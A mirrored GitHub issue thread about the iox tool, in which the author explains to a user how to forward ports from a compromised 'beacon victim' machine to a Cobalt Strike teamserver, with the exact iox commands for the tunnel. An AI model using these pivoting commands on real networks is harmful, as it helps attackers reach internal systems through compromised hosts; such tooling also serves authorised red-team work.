GithubHelp home page GithubHelp logo

portforward command about iox HOT 6 CLOSED

eddieivan01 avatar eddieivan01 commented on August 18, 2024
portforward command

from iox.

Comments (6)

EddieIvan01 avatar EddieIvan01 commented on August 18, 2024

Assume that your teamserver IP is 1.1.1.1

On your beacon victim:

./iox -r 10.8.0.1:443 -r 1.1.1.1:9999

On your teamserver:

./iox -l 8004 -l 9999

Then your teamserver 1.1.1.1:8004 is forwarded to 10.8.0.1:443 which is in intranet

from iox.

Chantal2019 avatar Chantal2019 commented on August 18, 2024

Thank you soooo much for replying even though this is not an issue. Appreciate it! This is a great tool and I really want to start using it. So let me just explain something quickly! My team server ip is 10.8.0.80 for example and the beacon I am running on victim is for example 10.10.21.113 ( internal victim ip). So what I want to do is forward everthing to my local 443 port on my team server .

So I cobalt with the default port forward is easy since I will do rportfed 8004 10.8.0 80 ( my team server ip ) 443 : this will open a listining port on vitim on port 8004.

you are telling me to do ./iox -r 10.8.0.1:443 -r 1.1.1.1:9999 which I do not understand . is 10.8.0.1:443 the vitim address for example ?

from iox.

EddieIvan01 avatar EddieIvan01 commented on August 18, 2024

Ooo sorry, I have misunderstood the rportfwd function


Easily run this command on victim machine

./iox -l 8004 -r 10.8.0.80:443

from iox.

Chantal2019 avatar Chantal2019 commented on August 18, 2024

thank you :)

from iox.

Chantal2019 avatar Chantal2019 commented on August 18, 2024

keep getting
Unrecognized Mode

Maybe I need to do ./iox fwd -l 8004 -r 10.8.0.80:443 Instead ?

from iox.

EddieIvan01 avatar EddieIvan01 commented on August 18, 2024

Sorry, my mistake, use ./iox fwd -l 8004 -r 10.8.0.80:443

from iox.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.